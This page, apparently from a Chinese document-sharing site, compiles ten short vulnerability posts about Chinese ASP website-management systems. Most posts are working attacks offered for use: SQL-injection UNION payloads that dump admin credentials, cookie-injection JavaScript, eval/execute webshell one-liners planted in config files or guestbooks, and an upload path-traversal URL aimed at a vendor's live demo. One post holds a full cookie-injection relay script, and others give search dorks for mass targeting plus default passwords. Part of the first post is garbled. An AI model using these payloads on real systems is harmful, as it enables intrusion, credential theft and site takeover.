欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警

蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警

2023-05-04 07:58:22 收藏本文 下载本文

“预见简简单单”通过精心收集,向本站投稿了10篇蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警,以下是小编为大家准备的蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警,仅供参考,欢迎大家阅读。

蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警

篇1:蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警

蓝科企业网站管理系统中英繁版V1.0 漏洞@程序- - 怎看也像 w78 程序

後台像- - B 搜索字搜出淼囊惨- - (可是文件名不同啊- -)

]什N- -ewebeditor 5.5 上髀┒

搜索字:inurl:eshowshop.asp?id=

分e?在於多了一E SHOP......- -

篇2:驾校培训网站管理系统 v1.0 漏洞漏洞预警

<%

Set rsnews=Server.CreateObject(“ADODB.RecordSet”)

sql=“update news set hits=hits+1 where id=”&cstr(request(“id”))

conn.execute sql

单纯的reuqest,并没用指定是request.querystring(),还是request.form,或request.cookie ().

EXP:

localhost/jiaxiao/shownews.asp

javascript.:alert(document.cookie=“id=”+escape(“107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin”))

篇3:shypostShyPost企业网站管理系统 若干漏洞漏洞预警

ShyPost企业管理系统拥有十几种模板,用户可自由选择,不同模板后台管理功能是一样的,以下 为其中一个模板的前后台测试,欢迎用户测试,

后台演示: www.shypost.com/demo/admin

测试帐号: admin 密码 admin

前台演示: www.shypost.com/demo

销售价格:350元/套

1、注入:

union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin

拿shell:

网站配置中插入:“%><%eval request(”a“)%><%s=”

连接 yoursite.com/inc/config.asp

2、写马:

留言本写入一句话,连接www.badguest.cn/databases/databases.asp

3、其它若干问题

篇4:6CMS企业网站管理系统(中英繁三语版) sql注射漏洞漏洞预警

g.cn关键字:6CMS企业望站管理系统(中英繁三语版)

默认帐号密码:admin

后台:admin/

也不知道程序员怎么弄得,我看到程序admin目录下有个防注入的sql.asp

但是上级目录却没有

默认数据库:data/#sze7xiaohu.mdb

seeion验证感觉也有点乱来,记得有个admin目录下发布职位的文件可以直接访问(具体哪个文件),貌似可以直接发布消息

直接放啊D,

6CMS企业网站管理系统(中英繁三语版) sql注射漏洞漏洞预警

后台也直接数据库备份。

感觉没啥利用价值。没意思,自己当研究玩吧

作者:猴子

篇5:网趣网站管理系统上传漏洞漏洞预警

程序:网趣网站管理系统1.2.1 (包含动态版和静态版 均存在此漏洞)

下载:www.codepub.com/d/downpage.php?n=1&id=18716::1288173021

FROM:www.st999.cn/blog

DATA:/04/22

利用方法:/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

漏洞文件:Free_ComQu\Ku_edit\ComquUp.asp

源码 :

<%Response.Buffer=True

Server.ScriptTimeOut=9999999

On Error Resume Next%>

酷航文件上传系统V2

<%

response.Cookies(“ComquUp”)=“1”

'您可以把上面判断cookies的写入语句复制到您登录的地方,这样便是“只有登录后才能操作上传文件,”

if request.Cookies(“ComquUp”)=“1” then%>

<%

ComquDFormName=trim(request(“nf”))

ComquDInputName=trim(request(“ni”))

ComquDYNReName=trim(request(“nr”))

ComquDPath=trim(request(“nt”))

ComquDDM=trim(request(“nm”))

ComquDPathQ=trim(request(“nq”))

ComquDType=trim(request(“lx”))

if ComquDPath“” then:ComquSavePath=ComquDPath:else:ComquSavePath=“/Upfile/edit/”:end if

if ComquDPathQ“” then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if

ComquYNPath(ComquSavePath)

if ComquDType=“1” then

ComquFileNames=“jpg,gif,png,bmp”

ComquBigSize=1024000'单位B

elseif ComquDType=“2” then

ComquFileNames=“swf,flv”

ComquBigSize=10240000

elseif ComquDType=“3” then

ComquFileNames=“avi,wmv,asf,mov,mp3,wma”

ComquBigSize=102400000

elseif ComquDType=“4” then

ComquFileNames=“rm,ra,ram,rmvb”

ComquBigSize=102400000

elseif ComquDType=“5” then

ComquFileNames=“txt,rar,zip,doc,7z,ppt”

ComquBigSize=102400000

end if

ComquFileSize=Request.TotalBytes

If ComquFileSize>0 Then

if ComquFileSize

Set ComquUpStm=Server.CreateObject(“ADODB.Stream”)

ComquUpStm.Type=1

ComquUpStm.Open

ComquUpStm.Write Request.BinaryRead(ComquFileSize)

ComquUpStm.Position=0

ComquFormDataSize=ComquUpStm.Read

ComquCrlf=chrB(13)&chrB(10)

ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf)

ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf)

Set ComquFormStm=Server.Createobject(“ADODB.Stream”)

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=ComquFormStart + 1

ComquUpStm.CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3

ComquFormStm.Position=0

ComquFormStm.Type=2

ComquFormStm.CharSet=“GB2312”

ComquFormStmText=ComquFormStm.Readtext

ComquFormStm.Close

ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,“\”)+1,ComquFormEnd)

ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,“.”))

If ComquCheckFileCZM(ComquUpFileNAll) Then

if ComquDDM“” then

ComquUpFileName=ComquDDM

else

if ComquDYNReName“ok” then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right(“0”&Month(now),2)&right(“0”&Day(now),2)&right(“0”&Hour(now),2)&right(“0”&Minute(now),2)&right(“0”&Second(now),2)&right(replace(Request.ServerVariables(“REMOTE_ADDR”),“.”,“”),4)&ComquUpFileCZM:end if

end if

ComquSaveFile=Server.MapPath(ComquSavePath & ComquUpFileName)

k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4

l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2

ComquFormStm.Type=1

ComquFormStm.Open

ComquUpStm.Position=k-1

ComquUpStm.CopyTo ComquFormStm,l

ComquFormStm.SaveToFile ComquSaveFile,2

ComquSaveFileName=Mid(ComquSaveFile,InstrRev(ComquSaveFile,“\”)+1)

if ComquDFormName“” then:Response.write“”:else:Response.write“”:end if

Response.write“”&left(ComquSaveFileName,3)&“**”&ComquUpFileCZM&“ 上传成功! 重新上传

Else

Response.write“文件格式不正确! 重新上传文 件

End If

Set ComquFormStm=Nothing

UploadStream.Close

Set UploadStream=Nothing

Function ComquCheckFileCZM(FileName)

FileType=Split(ComquFileNames,“,”)

For i=0 To Ubound(FileType)

If LCase(Right(FileName,len(FileType(i))))=LCase(FileType(i)) then

ComquCheckFileCZM=True

Exit Function

Else

ComquCheckFileCZM=False

End if

Next

End Function

Function ComquYNPath(FolderName)

ComquFolderM=Server.Mappath(FolderName)

Set Fso=CreateObject(“Scripting.FileSystemObject”)

If Not Fso.FolderExists(ComquFolderM) Then

Fso.CreateFolder(ComquFolderM)

End If

Set Fso=Nothing

End Function

else

Response.Write“大小超过”&ComquBigSize&“B! 重新上传

end if

Else%>

<%End if

else:response.Write(“您无权上传操作!”):end if%>

嘿嘿,,,很明显的nt参数未过滤,可以构造路径,直接上传获得shell,

此程序的官方演示地址,也存在着这漏洞。

main.comqu.com/ku_edit/ComquUp.asp?nf=&ni=a&nr=ok&nt=../st999.asp;&nm=&nq=&lx=1

直接找个jpg的马儿上传,右键查看源码,获得名称../st999.asp;st999.asp;0429371540.jpg,实际上马儿的名称是st999.asp;201104220019371540.jpg,shell地址就是upload/2011/4/201104221740280470.jpg

这个是一句话,密码是st999,大家就不要轮J官方的演示站了,嘿嘿。。。

篇6:仙游旅行社管理系统v1.0漏洞及修复漏洞预警

Author:mer4en7y

Blog:www.hi.baidu.com/alonecode

1)注入漏洞:

漏洞文件:new_list.asp:

bid = trim(request(“bid”))

sid = trim(request(“sid”))

if bid“” then

bwhere = “ and bigid=”& bid &“”

else

bwhere = “”

end if

if sid“” then

swhere = “ and smallid=”& sid &“”

else

swhere = “”

end if

idsql=“select * from lxscms_n where shenhe=1”& bwhere & swhere &“ order by id desc”

表名:lxscms_u字段:qwbmuname,qwbmupwds

默认后台:/admin

2)数据库默认地址:

/admin/#a&_as12=b.as.mdb

修复:new_list.asp页面过滤参数输入,

仙游旅行社管理系统v1.0漏洞及修复漏洞预警

修改默认数据库地址,做防下载处理

篇7:凡诺企业网站管理系统上传漏洞漏洞预警

凡诺企业网站管理系统上传漏洞,该程序在源码之家月排行第三,下载量还是很大的。

与其说是漏洞,还不如说是疏忽,“漏洞”是编辑器fckeditor的测试上传页面没有删除,给 创造了可乘之机,

谷歌和百度关键字:凡诺企业网站管理系统 或者admin/pf_login.asp

可以用挖掘鸡批量抓,很多的。

利用方法:

www.****.com/admin/fckeditor/editor/filemanager/connectors/test.html

上传***.asp;.gif或者****.asp;gif文件,利用IIS的解析漏洞,不多说了,大家都懂的……

篇8:CGSAIL网站管理系统 0day漏洞预警

<%

dim sql

dim rs

sql = “select * from [”&CgsailPrefix&“admin] where id=”&request(“id”)

Set rs = Server.CreateObject(“ADODB.RecordSet”)

rs.Open sql,conn,1,1

photo=trim(rs(“photo”))

%>

localhost/user_view.asp?id=1%20and%201=1

篇9:良精企业网站管理系统V09漏洞漏洞预警

涉及版本:良精企业网站管理系统(2007-V09)官方正式商业版

其他版本未做测试

/*应该是所有的*/

漏洞文件:

EnProductShow.asp /*后续版本*/

Product_Show.asp /*早期版本*/

ProductShow.asp /*后期版本*/

其实都是一样的-_-!

漏洞描述:

变量ID信任客户端提交值,带入sql语句查询,程序用了通用SQL防注入程序,详细见Check_Sql.asp,关键代码如下

****************************************************************************

[复制到剪贴板]

CODE:

ID=trim(request(”ID”))

if ID=”“ then

response.Redirect(”EnProduct.asp”)

end if

sql=”select * from Product where ID=” & ID & “”

Set rs= Server.CreateObject(”ADODB.Recordset”)

rs.open sql,conn,1,3

if rs.bof and rs.eof then

response.write””

else

rs(”Hits”)=rs(”Hits”)+1

rs.update

****************************************************************************

Check_Sql.asp仅对GET和POST的数据进行了过滤,忽略了Cookie利用方法:

Google搜索关键字 inurl:”EnProductShow.asp?id=”

cookie注入,支持union,Product表26个字段,演示如下

localhost/EnProductShow.asp?ID=229

javascript.:alert(document.cookie=”id=”+escape(”229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin”))

localhost/EnProductShow.asp

即可union出管理员帐号,密码(md5值)

后台地址

/admin/login.asp

后台拿shell方法很多。略过

补充:南方数据企业网站管理系统 ver10.0,漏洞和这个是一样的,利用的方法也大致相同,只是admin的字段数目不一样而已

/*―――――――――-xiao.k的注释&补充_0614―――――――――-*/

本来自己也在分析这个系统的,既然tr4c3在很久之前就分析了.我也没啥必要去看了.

发现的问题就是union不能alert出pwd.

我的方法是中转cookies注入,脚本原型来自jmdcw

########################################################

[复制到剪贴板]

CODE:

< %

ID=request(”ID”)’确认id存在!

JmdcwName=escape(ID)

JmStr=”id=”&JmdcwName

url=request(”url”)

if request(”mod”)=”1″ then

url2=”Product_Show.asp” ‘早期版本

else

url2=”ProductShow.asp” ‘后期版本

end if

Url=””&url&”/”&url2 ‘请自行修改

JMUrl=url

JmRef=url

JmCok=”ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ”

JmCok=JmCok & “;” & Jmstr &”;”

JmCok=URLEncoding(JmCok)

jmstr=””

response.write  PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)

Dim Http

Set Http = Server.CreateObject(”msxml2.serverXMLHTTP”)

With Http

.Open “POST”,PostUrl,False

.SetRequestHeader “Content-Length”,Len(PostStr)

.SetRequestHeader “Content-Type”,”application/x-www-form-urlencoded”

.SetRequestHeader “Referer”,PostRef

.SetRequestHeader “Cookie”,PostCok

.Send PostStr

PostData = .ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = “”

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn, I + 1, 1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

I = I + 1

End If

Next

bytes2BSTR = strReturn

End Function

Function URLEncoding(vstrin)

strReturn=”“

Dim i

For i=1 To Len(vstrin)

ThisChr=Mid(vstrin,i,1)

if Abs(Asc(ThisChr))< &HFF Then

strReturn=strReturn & ThisChr

Else

InnerCode=Asc(ThisChr)

If InnerCode<0 Then

InnerCode=InnerCode + &H10000

End If

Hight1=(InnerCode And &HFF00) \&HFF

Low1=InnerCode And &HFF

strReturn=strReturn & “%” & Hex(Hight1) & “%” & Hex(Low1)

End if

Next

URLEncoding=strReturn

End Function

% >

########################################################

保存为cookies.asp

usage:

blog.sadk.org/temp/02/cookies.asp?mod=2&url=admin.asp99.cn/ljweb2007&id=80

注意:需要添加关键字的.

id一定要存在

直接在配置里写马 ”%><%execute(request(“tmd”))%><%Response.End’

篇10:智有道专业旅游系统 v1.0 漏洞漏洞预警

默认信息:

“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!

后台管理

后台路径:admin/login.asp

管理员:user:admin

密码:psw:123456

下载地址:down.chinaz.com/soft/30295.htm

Demo Url:will2011.w701.hzdemo.cn/

exp:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin

或者:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin

遍历目录:

www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..

其它:

www.0855.tv/admin/do/Admin_Style.asp

www.0855.tv/admin/do/data.asp

关键字:

为防批量,特略,

智有道专业旅游系统 v1.0 漏洞漏洞预警

【蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警】相关文章:

1.毕业论文选题系统上传漏洞漏洞预警

2.稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

3.bug漏洞处理机制系统bugtracker漏洞预警

4.EFront 3.6.9 社区版多个漏洞漏洞预警

5.Nginx 安全漏洞 (CVE4547)漏洞预警

6.DedeCMS会员中心书签管理SQL注射漏洞漏洞预警

7.CVE0497 漏洞利用学习笔记漏洞预警

8.网马解密初级篇漏洞预警

9.COCOON Counter统计程序漏洞总结漏洞预警

10.天下马ASP收信程序漏洞漏洞预警

下载word文档
《蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

最新推荐
猜你喜欢
  • 返回顶部